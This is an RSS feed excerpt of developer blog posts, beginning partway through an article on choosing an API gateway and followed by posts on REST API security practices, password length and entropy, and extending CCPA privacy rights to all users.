&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fc6zzia4cwhq7gb37kxpt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fc6zzia4cwhq7gb37kxpt.png" alt="Kong Gateway Features"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Authentication
&lt;/h3&gt;

&lt;p&gt;One of the most important features of a gateway is how it handles authentication. By authenticating all incoming requests in the gateway, you eliminate the need to perform authentication in each individual service. This can significantly improve your API's performance, and it reduces the available attack surface.&lt;/p&gt;

&lt;p&gt;The authentication methods that a gateway supports is an important factor to consider when evaluating your options. What type of authentication do you want to use? Some will support a wide range of methods (basic authentication, API keys, OAuth, LDAP, etc.), while others may be more limited. Do you need to allow anonymous requests? Do you need to support multiple authentication methods to a specific service?&lt;/p&gt;

&lt;h3&gt;
  
  
  Authorization
&lt;/h3&gt;

&lt;p&gt;Once a request is authenticated, the gateway may restrict which services the request has access to. This is generally done through policies that are setup in the gateway's configuration. For example, your API may have some services that are available to partner organizations, while others are restricted to internal use only.&lt;/p&gt;

&lt;p&gt;To understand the type of authorization support you need, consider if your API needs to support different levels of access for different users. Do you offer subscription plans where higher tiers have access to additional services? Are your services configured in a way that allows you to handle authorization in the gateway, or does that logic need to be handled at the service layer?&lt;/p&gt;

&lt;h3&gt;
  
  
  Traffic Control
&lt;/h3&gt;

&lt;p&gt;Another major feature of API gateways is the ability to manage the traffic accessing your services. You may want to limit the number of requests by IP address, or for a particular API key, for example. You may also want to limit the size or type of requests that your system will accept. This feature can also help alleviate stress on lower resource services. This can help stop DDoS attacks, prevent abuse of your API, and help prioritize system responses.&lt;/p&gt;

&lt;p&gt;When evaluating your gateway options, consider your organization's needs for regulating traffic. How much traffic can you backend services handle? Are some services more susceptible to overload than others? If you offer different access tiers for your API, do you need to allow higher rate limits for your higher tiered customers? Do you have specific applications or customers who should receive priority during heavy load times?&lt;/p&gt;

&lt;h3&gt;
  
  
  Logging and Analytics
&lt;/h3&gt;

&lt;p&gt;Gateways can also allow you to consolidate common functionality like logging and analytics. This can reduce duplication across services. Most can also be integrated with third-party solutions to provide complete monitoring for your systems.&lt;/p&gt;

&lt;p&gt;You'll need to consider what type of monitoring and logging your organization needs. What security or analytics tools do you need to integrate? Do you need to correlate gateway logs with service logs?&lt;/p&gt;

&lt;h3&gt;
  
  
  Payload Transformations
&lt;/h3&gt;

&lt;p&gt;The ability to transform payloads is another common feature for gateways to support. This allows organizations to support services that use mixed protocols, while providing a consistent interface to their API. Additionally, legacy services can be exposed with minimal effort, even if they use different response types.&lt;/p&gt;

&lt;p&gt;Think about the services your organization currently has in place. Do the responses need to be modified to match your API's responses? Do you need to support multiple protocols?&lt;/p&gt;

&lt;h1&gt;
  
  
  Comparing Gateway Options
&lt;/h1&gt;

&lt;p&gt;Beyond the feature questions above, there are several other points that need to be considered when selecting a gateway solution.&lt;/p&gt;

&lt;h3&gt;
  
  
  Self-Hosted vs. SaaS
&lt;/h3&gt;

&lt;p&gt;While different gateways may vary drastically in the features they support, they can all be divided into two basic categories: Self-Hosted or SaaS. There are numerous self-hosted gateway options available, and the features they support can vary widely. This type of gateway can be deployed either on-premises or to a cloud platform. If you're hosting your gateway yourself, you have much more control, but you also have the responsibility for ensuring that your systems are configured correctly, and for keeping the software up-to-date.&lt;/p&gt;

&lt;p&gt;SaaS gateways, on the other hand, are offered by all of the major cloud platforms. While they may differ slightly, they're all fairly similar in the features they offer. This type of gateway shifts some of the management responsibility off of your organization, like keeping the software updated. However, you will still need to ensure that your gateway is configured correctly to protect your backend services. One of the primary benefits of this type of gateway is its ease of integration with the cloud provider's other services.&lt;/p&gt;

&lt;p&gt;Your choice of gateway type will depend on the features your organization needs, and on how your backend services are deployed. If you're already using a cloud platform for hosting your services, it may make sense to use the platform's gateway, since it can easily integrate with your other services, such as authorization, logging and monitoring. On the other hand, cloud gateways may not provide some features, such as payload transformation and their traffic control functionality may be more limited. Additionally, it may be more difficult to integrate with third-party services that you use. If your services are mostly on-premises, or you're using other third-party tools for monitoring or logging, it may make more sense to use a self-hosted option. Additionally, self-hosted solutions may offer the ability to create your own plugins if you need very specific custom functionality.&lt;/p&gt;

&lt;h3&gt;
  
  
  Deployment Complexity
&lt;/h3&gt;

&lt;p&gt;Another factor to consider is how easily the gateway can be deployed. How complex is the initial configuration? What other resources are required by the gateway software? How difficult is it to redeploy the gateway when changes are made? Can deployments be automated?&lt;/p&gt;

&lt;p&gt;In general, cloud gateways are going to require less initial setup. They will generally provide a developer UI, as well as an API, and can usually be easily integrated with the platform's automated deployment tools, such as Cloudformation or Google Cloud Deployment Manager. With a self-hosted solution, you will need to handle configuration and deployment on your own.&lt;/p&gt;

&lt;p&gt;Different self-hosted solutions will also require different resources to be deployed, configured and maintained. For example, Apigee requires Cassandra, Zookeeper, and Postgres to run, while other solutions like Express Gateway and Tyk.io only require Redis. This won't be an issue if you choose to go with a cloud gateway, because they abstract the additional resource requirements, so you can just focus on the API itself.&lt;/p&gt;

&lt;h3&gt;
  
  
  Open Source vs. Proprietary
&lt;/h3&gt;

&lt;p&gt;You'll also need to decide if you want to use an open source solution or a proprietary gateway. Do you foresee the need to make changes to the gateway's source code? What level of support do you need? Does the solution allow you to build custom plugins if needed? Are you already using other products from a vendor that offers an API gateway solution? There are both proprietary and open source options for self-hosted solutions, however all cloud gateways will fall into the proprietary category.&lt;/p&gt;

&lt;p&gt;Obviously, if you go with a proprietary solution, you won't have access to the source code, and won't be able to customize the software if it doesn't meet your needs. However, some may allow you to create plugins to provide some custom functionality if you need it. Open source solutions, on the other hand, allow you to have complete control over your gateway. If it doesn't include all of the features you need, you can add them. One thing to remember though, is that if you fork and customize an open source project, you'll take on the responsibility of ensuring that your version gets future changes made in the project. If the custom functionality is something others might find useful, this can be resolved by contributing your changes back to the project. Another problem with open source solutions is that there may be a risk of the project being abandoned. When evaluating your options, make sure to determine if a project is under active development and has enough community involvement to keep the project going.&lt;/p&gt;

&lt;p&gt;Usually, you'll have far more technical support if you go with a proprietary solution. When you're paying for a product, the company has a vested interest in ensuring that you're happy and can use the product successfully. The only support you can expect for open source solutions is from the community. This is another reason to make sure that a project has strong community support. That being said, a lot of open source projects are backed by larger companies that offer support packages, for a price.&lt;/p&gt;

&lt;h3&gt;
  
  
  Price
&lt;/h3&gt;

&lt;p&gt;Finally, you'll need to consider the price for each solution. Most self-hosted proprietary vendors are not transparent about their pricing, so you'll need to contact their sales team to get accurate pricing for comparison. Cloud gateways, however, do provide pricing details. They generally run on a per-call pricing model, with additional charges for the amount of data transferred. In order to figure out which solution is more cost-effective, you'll need an estimate of the amount of traffic you expect your API to receive, and the average response size. While a cloud solution may be less expensive for low-volume APIs, if you are expecting a lot of traffic, there will be a tipping point where it becomes more expensive to pay per-call than to license and host a solution yourself.&lt;/p&gt;

&lt;h1&gt;
  
  
  Available Options
&lt;/h1&gt;

&lt;p&gt;With all of these factors in mind, here are a few popular options of each type to get you started in your research:&lt;/p&gt;

&lt;h3&gt;
  
  
  Cloud platform gateways
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://aws.amazon.com/api-gateway/" rel="noopener noreferrer"&gt;AWS API Gateway&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/api-gateway" rel="noopener noreferrer"&gt;Google Cloud API Gateway&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://azure.microsoft.com/en-us/services/api-management/" rel="noopener noreferrer"&gt;Azure API Management&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.ibm.com/cloud/api-connect" rel="noopener noreferrer"&gt;IBM API Connect&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Proprietary, self-hosted solutions
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.mulesoft.com/" rel="noopener noreferrer"&gt;Mulesoft&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.axway.com/en/products/api-management/gateway" rel="noopener noreferrer"&gt;Axway&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/apigee/" rel="noopener noreferrer"&gt;Apigee&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Open source, self-hosted solutions
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://konghq.com/kong/" rel="noopener noreferrer"&gt;Kong&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://tyk.io/" rel="noopener noreferrer"&gt;Tyk.io&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.express-gateway.io/" rel="noopener noreferrer"&gt;Express Gateway&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.krakend.io/" rel="noopener noreferrer"&gt;KrakenD&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;While this certainly isn't an exhaustive list of all available options, these are some of the most popular API gateways. The best choice will depend greatly on your organization's needs. Hopefully, the factors above will help guide you as you evaluate your options.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>microservices</category>
    </item>
    <item>
      <title>Best Practices for Securing Your REST APIs</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 16 Sep 2020 03:47:19 +0000</pubDate>
      <link>https://forem.com/leading-edje/best-practices-for-securing-your-rest-apis-563c</link>
      <guid>https://forem.com/leading-edje/best-practices-for-securing-your-rest-apis-563c</guid>
      <description>&lt;p&gt;APIs are the backbone of the modern data-driven economy. Whether you're moving your infrastructure to the cloud, shifting to a microservice based architecture, or just trying to integrate new services with your existing monolithic systems, chances are your business is relying on APIs to transfer your data. With the speed of business, it's easy for security to become an afterthought.&lt;/p&gt;

&lt;p&gt;With your customer's and partner's relying on you to keep their data safe, it's important to make security a top priority when designing your APIs. With that in mind, here are ten tips for ensuring that your APIs are secure. While these tips are specifically aimed at REST APIs, many of them are also applicable to other types, such as GraphQL APIs.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Always use transport layer security
&lt;/h3&gt;

&lt;p&gt;Your APIs should only expose HTTPS endpoints. This protects credentials used to authenticate with your systems from being intercepted in transit, and helps to guarantee the integrity of the data being returned.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Use an established and trusted authentication framework
&lt;/h3&gt;

&lt;p&gt;Avoid attempting to "roll-your-own" security solution for your APIs. Use a well established framework like Auth0, OpenId Connect, Amazon Cognito, or Firebase Authentication. These frameworks have teams of developers who have spent thousands of hours working out bugs and finding and fixing vulnerabilities.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Consider using an API Gateway service
&lt;/h3&gt;

&lt;p&gt;If your API is cloud based, consider using the cloud platform's API Gateway service. This type of service provides fine grained controls over who can access your endpoints. All of the major cloud platforms have a gateway service available, and the additional layer of protection is well worth the cost.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Whitelist permitted HTTP methods
&lt;/h3&gt;

&lt;p&gt;If your exposed endpoints only use specific methods, whitelist the methods that are allowed, and reject all others. For example, if your API is read-only, you can whitelist the GET method, and reject any POST, PUT or DELETE requests.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Always validate user input
&lt;/h3&gt;

&lt;p&gt;Any input sent by the user must be validated and sanitized before it reaches your application logic. Be as strict as possible with your validation. Use strong types and regular expressions to make sure the input you receive matches what your application expects and is able to handle. Consider establishing a reasonable size limit for requests, and reject any larger requests. All failed validation should be logged and monitored for unusual request behavior.&lt;/p&gt;

&lt;h3&gt;
  
  
  6. Apply rate limiting
&lt;/h3&gt;

&lt;p&gt;Establish reasonable limits on the amount of requests you expect to receive from any single source. Any requests above this limit should be dropped. This can help prevent denial of service attacks on your systems. Depending on how your API is structured, you may wish to implement even finer controls by specifying different limits for different resources, or by adjusting the limits based on the client making the requests.&lt;/p&gt;

&lt;h3&gt;
  
  
  7. Be as specific as possible with CORS settings
&lt;/h3&gt;

&lt;p&gt;CORS stands for cross-origin resource sharing, and your settings determine how cross-domain requests are handled by browsers. If your API isn't expecting cross-origin requests, you should disable CORS. Otherwise, you should be as specific as possible with the domains that you allow cross-origin requests from. It's also important to note that CORS is strictly a client-side security feature, and should not be relied on, in any way, for server-side security.&lt;/p&gt;

&lt;h3&gt;
  
  
  8. Take advantage of your framework's built-in security features
&lt;/h3&gt;

&lt;p&gt;No matter your development language, there's a pretty good chance you're using a framework to build your API. Whether it's Django, Rails, Spring or ASP.NET Core, nearly all modern API frameworks have some built-in security features that you should be taking advantage of, such as protection against attacks like cross-site request forgery and click-jacking, session security, or header validation. That being said, it's also important not to fall into the trap of believing that your framework's default security configuration is good enough. Take the time to fully understand the features available in your framework, and make sure your configuration maintains the &lt;a href="https://en.wikipedia.org/wiki/Principle_of_least_privilege" rel="noopener noreferrer"&gt;principle of least privilege&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  9. Never store credentials in version control
&lt;/h3&gt;

&lt;p&gt;Any secrets (passwords, API keys, SSH keys, etc.) should never be checked in to your version control system. Even if your repository is private, it's still considered bad practice to keep your credentials with your source code. Instead, consider using environment variables for passing your secrets into your applications, or utilize a service specifically for storing secrets, such as &lt;a href="https://www.vaultproject.io/" rel="noopener noreferrer"&gt;Hashicorp's Vault&lt;/a&gt;. Most cloud platforms also have their own services for storing and retrieving credentials.&lt;/p&gt;

&lt;h3&gt;
  
  
  10. Return appropriate error messages
&lt;/h3&gt;

&lt;p&gt;Make sure that any internal errors are caught and sanitized before being returned in your API responses. Your end users should never see any error messages that provide details on the architecture of your system. Raw error responses often contain a stack trace, and may expose information such as the database or libraries you're using, which an attacker may be able to use to exploit your system. Your error messages should be specific enough that the requester knows what happened, but generic enough as to not provide any details about the inner workings of your system. Also, make sure that your response uses the semantically appropriate HTTP status code for the given error.&lt;/p&gt;

&lt;p&gt;When your customer's and associate's data is at stake, security should never be an afterthought. It needs to be included in the planning process from the very beginning. With these tips in mind, you should be on your way to designing a secure and reliable API for your users. For more information on securing your APIs, check out the &lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html" rel="noopener noreferrer"&gt;REST Security Cheat Sheet&lt;/a&gt; from OWASP.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>architecture</category>
      <category>privacy</category>
    </item>
    <item>
      <title>Why Password Length Matters</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 02 Sep 2020 20:20:33 +0000</pubDate>
      <link>https://forem.com/leading-edje/why-password-length-matters-g17</link>
      <guid>https://forem.com/leading-edje/why-password-length-matters-g17</guid>
      <description>&lt;p&gt;I was working at a client that had recently changed their password policy from a minimum of eight characters to a minimum of fifteen characters. I was somewhat surprised at the reaction from a lot of the developers and business partners in the organization. I heard it mentioned derisively during several meetings, and was warned about it by co-workers who had recently had to reset their passwords. I applaud the security team for making this change, so I thought I'd try to give a high-level explanation of why password length is so important. This &lt;a href="https://xkcd.com/936/" rel="noopener noreferrer"&gt;XKCD comic&lt;/a&gt; does a pretty good job of summing things up, but let's dive a little deeper.&lt;/p&gt;

&lt;p&gt;&lt;br&gt;&lt;br&gt;
&lt;a href="https://xkcd.com/936/" rel="noopener noreferrer"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fimgs.xkcd.com%2Fcomics%2Fpassword_strength.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How "strong" is your password
&lt;/h2&gt;

&lt;p&gt;When we talk about password "strength", we're talking about how difficult it would be to crack your password by trying all possible combinations of characters. The simplest calculation of password strength is X&lt;sup&gt;L&lt;/sup&gt;, where X is the number of available characters and L is the length of the password. For example, if you can only use lowercase letters, x would be 26. If you can also use uppercase letters, x would be 52. The most common character set used in passwords today is 94 characters. This includes all alphanumeric and special characters on a standard keyboard. So, a 8 character password using this set would require 94&lt;sup&gt;8&lt;/sup&gt;, or 6,095,689,385,410,816, guesses to crack the password.&lt;/p&gt;

&lt;p&gt;It's more common today to see password strength discussed in terms of "entropy". This value is based on information theory, and is measured in bits. The formula for finding bits of entropy is log2X&lt;sup&gt;L&lt;/sup&gt;. If you're like me, and prefer not to dive to much deeper into the math, &lt;a href="https://en.wikipedia.org/wiki/Password_strength#Random_passwords" rel="noopener noreferrer"&gt;this article has a handy chart&lt;/a&gt; for calculating bits of entropy. Using that chart with the character set from the previous example, we see that each character in our password gives us 6.555 bits. So, at 8 characters we have about 52.44 bits of entropy.&lt;/p&gt;

&lt;p&gt;Now, let's see what happens when we tweak the numbers a little. Say we decide to allow our passwords to use spaces (which you should). We now have a 95 character set, instead of 94. Using the same entropy chart, we now have 6.57 bits per character. With our previous 8 character password, that gives us 52.56 bits of entropy. So increasing the size of the character set by one increases entropy by 0.12 bits. Compare that with keeping the previous character set, and increasing the length by one. With 6.555 bits per character we now have 59 bits, an increase of 6.56 bits. As you can see, increasing the length has a significantly greater impact on entropy than increasing the size of the character set.&lt;/p&gt;

&lt;p&gt;But wait a minute! According to that formula, the password in the cartoon would have an entropy of 72 but it says it's only 28 bits. What's the deal?&lt;/p&gt;

&lt;p&gt;Well, that brings us to the real problem with calculating password strength. I won't go into the details of how the author came up with their number, but &lt;a href="https://security.stackexchange.com/a/6096" rel="noopener noreferrer"&gt;this StackExchange answer&lt;/a&gt; does a great job of breaking down the math, and it turns out, 28 bits is fairly accurate. The thing is, measuring bits of entropy using this formula only works when the password is completely random. And, it turns out that people are terrible at creating random passwords. So, how do you make a password more secure?&lt;/p&gt;

&lt;h2&gt;
  
  
  Password vs. Passphrase
&lt;/h2&gt;

&lt;p&gt;A passphrase consists of a set of words, rather than a set of characters. The one benefit of a passphrase is that it allows you to pull from a much larger "character" set. While a normal password allows you to choose from 94 characters for each slot, selecting a word from the dictionary provides a lot more options, as each word becomes a character. Now, not every word in the dictionary works well as part of a passphrase, so it is common to use a smaller list of fairly short words. A Diceware list for example, is a list of 7,776 unique words. With a set of this size, we can now get 12.925 bits of entropy for each character. This means a passphrase with just 4 words would have 51.7 bits of entropy.&lt;/p&gt;

&lt;p&gt;The second benefit of using passphrases is that they tend to be easier to remember. This is the author's main point in the comic. When you make users choose a password, and then make weird manipulations to it, like capitalizing letters and adding symbols, it tends to be difficult to remember. On the other hand, 4 common words are generally easier to remember.&lt;/p&gt;

&lt;p&gt;On the other hand, passphrases suffer from one of the same problems as passwords. In order to get the full entropy, the words need to be selected randomly. When it comes to passwords, randomness is the key to security, because it makes it impossible for attackers to use information about the victim to lower the number of guesses needed to crack the password.&lt;/p&gt;

&lt;p&gt;So, are passphrases better than passwords? Unfortunately, this isn't a simple answer. This topic has long been debated in the security community, with supporters on both sides. A good rule to follow is: If you can use a password manager, use a password. If you need to remember it yourself, use a passphrase.&lt;/p&gt;

&lt;h2&gt;
  
  
  What can you do to keep your passwords secure?
&lt;/h2&gt;

&lt;p&gt;So yes, adding length to a password increases the strength exponentially, but as you can see, there's a lot more to password security than just length versus complexity. Randomness is the key to good security, but it makes passwords difficult to remember. This leads to users choosing insecure passwords. Here are some things you can do to make sure your passwords are as strong as possible:&lt;/p&gt;

&lt;p&gt;If your a user:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use a password manager if you can.&lt;/li&gt;
&lt;li&gt;Try to use a password that is at least 12 characters in length.&lt;/li&gt;
&lt;li&gt;Use a randomly generated password (especially if the site limits your password length).&lt;/li&gt;
&lt;li&gt;Don't reuse the same password on multiple systems.&lt;/li&gt;
&lt;li&gt;If you have to remember your password, consider using a passphrase.&lt;/li&gt;
&lt;li&gt;If you have to write your password down, keep it in a secure place, like a locked file drawer. &lt;b&gt;Don't&lt;/b&gt; leave it laying next to your keyboard or taped to your monitor.&lt;/li&gt;
&lt;li&gt;Enable 2-factor authentication if the site offers it.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you're making security policy:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Always use salted hashes to store user passwords.&lt;/li&gt;
&lt;li&gt;Make sure your policy requires &lt;u&gt;at least&lt;/u&gt; 12 characters (more is better).&lt;/li&gt;
&lt;li&gt;Don't limit the number of characters allowed for a password&lt;/li&gt;
&lt;li&gt;Allow all typeable characters (including spaces).&lt;/li&gt;
&lt;li&gt;Don't require uppercase, lowercase or special characters.&lt;/li&gt;
&lt;li&gt;Only require a user to change their passwords if you believe your system has been compromised.&lt;/li&gt;
&lt;li&gt;Don't allow password hints.&lt;/li&gt;
&lt;li&gt;Provide users with a password manager that can generate random passwords.&lt;/li&gt;
&lt;li&gt;Use 2-factor authentication.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>privacy</category>
    </item>
    <item>
      <title>Privacy Laws Are For Everyone - or at least they should be</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Mon, 15 Jun 2020 17:30:27 +0000</pubDate>
      <link>https://forem.com/leading-edje/privacy-laws-are-for-everyone-or-at-least-they-should-be-3l</link>
      <guid>https://forem.com/leading-edje/privacy-laws-are-for-everyone-or-at-least-they-should-be-3l</guid>
      <description>&lt;p&gt;The new &lt;a href="https://leginfo.legislature.ca.gov/faces/billTextClient.xhtml?bill_id=201720180AB375"&gt;privacy law&lt;/a&gt; passed by the California legislature went into effect January 1, 2020. While some of the specifics are still being worked out (the &lt;a href="https://oag.ca.gov/sites/all/files/agweb/pdfs/privacy/oal-sub-final-text-of-regs.pdf"&gt;final text of regulations&lt;/a&gt; was just submitted on June 1st), the intention of the law is to ensure five key rights for California consumers. They are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The right to know what personal information is being collected about them.&lt;/li&gt;
&lt;li&gt;The right to know if their information is being sold or disclosed, and to know who is getting access to it.&lt;/li&gt;
&lt;li&gt;The right to opt-out of the sale of their personal data.&lt;/li&gt;
&lt;li&gt;The right to access the data that a company has about them.&lt;/li&gt;
&lt;li&gt;The right to receive the same price and level of service if they choose to exercise their rights.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now, I want to make it clear that I'm not an attorney, and I do not claim to know all of the intricacies of the CCPA regulations. I was, however, part of a development team tasked with implementing compliance with the new law for a large e-commerce website. During this time, I was involved, not only in implementing the technical changes needed, but also in some of the business discussions around the requirements. One thing that I kept hearing, during these business discussions made me cringe. It was: "This only applies to users who live in California."&lt;/p&gt;

&lt;p&gt;Okay, that may seem like a fairly innocuous comment, and technically, it's true, but it was the intent behind the statement that really got to me. Look back at that list of five rights. They seem completely reasonable to me, and I think they would to most other users as well. But the company's legal and business teams were very adamant that the implemented changes should only be applied if we could verify that the request was coming from a resident of the state of California. Now, don't get me wrong, I understand their reasoning. They collect a lot of data about their users, and that data is very useful to their business. Additionally, the CCPA definitions of what constitutes "personal information" and "sales of data" are quite broad and cover a lot of business cases that go beyond specifically selling data for money. The company wants to continue collecting as much data as they can, so they can continue to operate in the same way they always have.&lt;/p&gt;

&lt;p&gt;I believe there are a couple of problems with this mindset though. First of all, there's the technical challenges. Identifying the data that belongs to a resident of California can be tricky. While there are already third-party companies offering to handle the processing of requests for data, it's far easier to handle all of the data in the same manner, regardless of where a user lives.&lt;/p&gt;

&lt;p&gt;Second, it's highly likely that other states will soon pass their own privacy laws. According to Axios, &lt;a href="https://www.axios.com/states-2020-tech-policy-fights-f467033d-c5f2-4467-a256-ee894c62190d.html"&gt;similar legislation is expected&lt;/a&gt; in New York, Illinois and Washington in 2020. There has also been some movement in Congress this year to pass &lt;a href="https://www.natlawreview.com/article/federal-privacy-legislation-update-consumer-data-privacy-and-security-act-2020"&gt;federal privacy regulations&lt;/a&gt;. Putting processes in place that deal only with users in California, overlooks the big picture of where privacy laws are headed. Treating all users' data the same now may alleviate some of the changes that will be required when new laws are passed.&lt;/p&gt;

&lt;p&gt;Finally, and most importantly, in my opinion, is customer sentiment. Yes, CCPA specifically applies to residents of California. But what will a customer living in South Dakota think about your company if they click the link to ask you not to sell their data and take the time to fill out the opt-out form, only to receive a response that the rules don't apply to them? It's likely that their opinion of your company will diminish considerably, and they may choose not to do business with you in the future.&lt;/p&gt;

&lt;p&gt;Before you commit to a process for implementing the new CCPA changes specifically for California residents it may be prudent to consider these questions first. Is it worth the effort to implement technical changes for handling customers in a specific state? Will you need to change your process if other states pass similar laws? And, while it's true that, currently, you only have to comply with the new CCPA regulations for customer's living in California, is it worth it to continue collecting and selling the data of other users, even if they ask you not to? Take a close look at the lifetime value of a customer, and consider whether it's more costly to lose their data, or to lose the customer entirely.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SfUhPiEd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>privacy</category>
      <category>security</category>
    </item>
  </channel>
</rss>
